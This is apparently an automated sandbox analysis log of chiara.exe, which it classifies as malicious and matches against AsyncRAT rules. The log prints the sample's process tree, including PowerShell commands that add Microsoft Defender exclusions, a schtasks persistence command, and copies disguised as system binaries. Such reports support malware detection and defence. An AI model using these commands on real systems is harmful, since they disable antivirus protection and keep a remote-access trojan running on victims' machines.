Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_02D91364	26_2_02D91364
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_02D9C67F	26_2_02D9C67F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_02D9B490	26_2_02D9B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_02D90FED	26_2_02D90FED
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 29_2_04A3B498	29_2_04A3B498
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 29_2_04A3B488	29_2_04A3B488
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_0476B490	31_2_0476B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_0476C662	31_2_0476C662
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_087D3A98	31_2_087D3A98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_04CAB4A0	33_2_04CAB4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_04CAB490	33_2_04CAB490

Source: chiara.exe, 00000000.00000000.2001699610.000000000041D000.00000080.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs chiara.exe
Source: chiara.exe , 00000002.00000003.2012003868.00000184567E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesdsd.exeH vs chiara.exe
Source: chiara.exe	Binary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs chiara.exe

Source: chiara.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 11.2.shost.exe.477b518.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.shost.exe.475185a.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.shost.exe.46aa52a.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.shost.exe.46fdeda.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.shost.exe.46d420a.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 13.2.InstallUtil.exe.370000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.shost.exe.477b518.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.shost.exe.475185a.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.shost.exe.46d420a.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2572034544.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000D.00000002.2155637688.0000000000372000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2572034544.0000000004751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2538242356.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 11.2.shost.exe.477b518.3.raw.unpack, E6KSshEW1vwa5qggbLPKvLqwN6b1wbxXb1RG.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.shost.exe.477b518.3.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.shost.exe.477b518.3.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, E6KSshEW1vwa5qggbLPKvLqwN6b1wbxXb1RG.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, E6KSshEW1vwa5qggbLPKvLqwN6b1wbxXb1RG.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.shost.exe.475185a.4.raw.unpack, E6KSshEW1vwa5qggbLPKvLqwN6b1wbxXb1RG.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.shost.exe.475185a.4.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.shost.exe.475185a.4.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 11.2.shost.exe.477b518.3.raw.unpack, f0skCLrudI2cVry9khnUAq5p7fo3SbZ3TLqTLM3yTfhDRuBUBzdagkKH8Eqr9Zm4EPeAqZ1KUCcRjKyunIaUDtZXejQ.cs	Base64 encoded string: 'XluUlRdkt9eghxMfeJ575UJrwPiOKDoKPC92n0BojJLbOao5NakQ4ucdz4BaKFH2IVso'
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, f0skCLrudI2cVry9khnUAq5p7fo3SbZ3TLqTLM3yTfhDRuBUBzdagkKH8Eqr9Zm4EPeAqZ1KUCcRjKyunIaUDtZXejQ.cs	Base64 encoded string: 'XluUlRdkt9eghxMfeJ575UJrwPiOKDoKPC92n0BojJLbOao5NakQ4ucdz4BaKFH2IVso'
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, f0skCLrudI2cVry9khnUAq5p7fo3SbZ3TLqTLM3yTfhDRuBUBzdagkKH8Eqr9Zm4EPeAqZ1KUCcRjKyunIaUDtZXejQ.cs	Base64 encoded string: 'XluUlRdkt9eghxMfeJ575UJrwPiOKDoKPC92n0BojJLbOao5NakQ4ucdz4BaKFH2IVso'
Source: 11.2.shost.exe.475185a.4.raw.unpack, f0skCLrudI2cVry9khnUAq5p7fo3SbZ3TLqTLM3yTfhDRuBUBzdagkKH8Eqr9Zm4EPeAqZ1KUCcRjKyunIaUDtZXejQ.cs	Base64 encoded string: 'XluUlRdkt9eghxMfeJ575UJrwPiOKDoKPC92n0BojJLbOao5NakQ4ucdz4BaKFH2IVso'
Source: 11.2.shost.exe.46d420a.5.raw.unpack, f0skCLrudI2cVry9khnUAq5p7fo3SbZ3TLqTLM3yTfhDRuBUBzdagkKH8Eqr9Zm4EPeAqZ1KUCcRjKyunIaUDtZXejQ.cs	Base64 encoded string: 'XluUlRdkt9eghxMfeJ575UJrwPiOKDoKPC92n0BojJLbOao5NakQ4ucdz4BaKFH2IVso'

Source: 11.2.shost.exe.475185a.4.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.shost.exe.475185a.4.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.shost.exe.46d420a.5.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.shost.exe.46d420a.5.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.shost.exe.477b518.3.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.shost.exe.477b518.3.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: explorer.exe, explorer.exe, 00000011.00000000.2182852685.0000000000401000.00000080.00000001.01000000.0000000D.sdmp, explorer.exe, 00000014.00000000.2195592157.0000000000401000.00000080.00000001.01000000.0000000D.sdmp, explorer.exe, 00000014.00000002.2197703621.0000000000402000.00000080.00000001.01000000.0000000D.sdmp, svchost.exe, 00000016.00000002.2264439657.0000000000401000.00000080.00000001.01000000.00000013.sdmp, consent.exe, 00000017.00000003.2270943066.00000236016E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.2272315679.0000000000401000.00000080.00000001.01000000.00000013.sdmp, svchost.exe, 00000018.00000002.2275043598.0000000000402000.00000080.00000001.01000000.00000013.sdmp, chiara.exe, icsys.icn.exe.0.dr, spoolsv.exe.4.dr, svchost.exe.7.dr, explorer.exe.3.dr	Binary or memory string: A*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
Source: explorer.exe, 00000004.00000002.3258213552.000000000041B000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: lH@*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
Source: chiara.exe, 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000003.00000002.2078954801.000000000041B000.00000004.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000007.00000002.2078066688.000000000041B000.00000004.00000001.01000000.00000012.sdmp, spoolsv.exe, 0000000C.00000002.2074529900.000000000041B000.00000004.00000001.01000000.00000012.sdmp, explorer.exe, 00000014.00000002.2197749949.000000000041B000.00000004.00000001.01000000.0000000D.sdmp, svchost.exe, 00000018.00000002.2275083268.000000000041B000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: llH@*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@54/44@6/5

Source: C:\Users\user\Desktop\chiara.exe

Code function: 2_2_00007FF6CCC8B6D8 GetLastError,FormatMessageW,LocalFree,

2_2_00007FF6CCC8B6D8

Source: C:\Users\user\Desktop\chiara.exe

Code function: 0_2_00410180 __vbaChkstk,__vbaStrCopy,__vbaAryConstruct2,__vbaOnError,CreateToolhelp32Snapshot,__vbaSetSystemError,__vbaRecUniToAnsi,Process32First,__vbaSetSystemError,__vbaRecAnsiToUni,#525,__vbaStrMove,__vbaSetSystemError,__vbaGenerateBoundsError,__vbaStrToAnsi,K32GetModuleFileNameExA,__vbaSetSystemError,__vbaStrToUnicode,__vbaFreeStr,#616,__vbaStrMove,__vbaStrMove,__vbaFreeStr,__vbaLenBstr,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaInStr,__vbaFreeStrList,__vbaRecUniToAnsi,Process32Next,__vbaSetSystemError,__vbaRecAnsiToUni,FindCloseChangeNotification,__vbaFreeStr,__vbaAryDestruct,__vbaFreeStr,__vbaFreeStr,

0_2_00410180

Source: C:\Users\user\Desktop\chiara.exe

Code function: 2_2_00007FF6CCCA8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

2_2_00007FF6CCCA8624

Source: C:\Users\user\Desktop\chiara.exe

File created: c:\users\user\desktop\chiara.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\NG4wukAcKOeM4S9Q
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03

Source: C:\Users\user\Desktop\chiara.exe

File created: C:\Users\user\AppData\Local\Temp\~DF0116B3D2B0E63248.TMP

Jump to behavior

Source: C:\Windows\Resources\Themes\icsys.icn.exe	Process created: C:\Windows\Resources\Themes\explorer.exe
Source: unknown	Process created: C:\Windows\Resources\Themes\explorer.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\Resources\Themes\explorer.exe
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Process created: C:\Windows\Resources\Themes\explorer.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\Resources\Themes\explorer.exe

Source: C:\Users\user\Desktop\chiara.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\chiara.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\chiara.exe

File read: C:\Users\user\Desktop\chiara.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\chiara.exe "C:\Users\user\Desktop\chiara.exe"
Source: C:\Users\user\Desktop\chiara.exe	Process created: C:\Users\user\Desktop\chiara.exe c:\users\user\desktop\chiara.exe
Source: C:\Users\user\Desktop\chiara.exe	Process created: C:\Windows\Resources\Themes\icsys.icn.exe C:\Windows\Resources\Themes\icsys.icn.exe
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Process created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\Resources\Themes\explorer.exe	Process created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SE
Source: C:\Windows\Resources\spoolsv.exe	Process created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
Source: C:\Users\user\Desktop\chiara.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe"
Source: C:\Windows\Resources\svchost.exe	Process created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PR
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" RO
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\consent.exe consent.exe 5152 322 0000013E5E228840
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" RO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'InstallUtil.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Logon Application.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Logon Application.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Logon Application" /tr "C:\Users\user\AppData\Roaming\Windows Logon Application.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windows Logon Application.exe "C:\Users\user\AppData\Roaming\Windows Logon Application.exe"
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windows Logon Application.exe "C:\Users\user\AppData\Roaming\Windows Logon Application.exe"
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windows Logon Application.exe "C:\Users\user\AppData\Roaming\Windows Logon Application.exe"
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\chiara.exe	Process created: C:\Users\user\Desktop\chiara.exe c:\users\user\desktop\chiara.exe	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process created: C:\Windows\Resources\Themes\icsys.icn.exe C:\Windows\Resources\Themes\icsys.icn.exe	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe"	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Process created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exe	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SE	Jump to behavior
Source: C:\Windows\Resources\spoolsv.exe	Process created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exe	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Process created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\consent.exe consent.exe 5152 322 0000013E5E228840
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" RO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'InstallUtil.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Logon Application.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Logon Application.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Logon Application" /tr "C:\Users\user\AppData\Roaming\Windows Logon Application.exe"

Source: C:\Users\user\Desktop\chiara.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: urlmon.dll	Jump to behavior
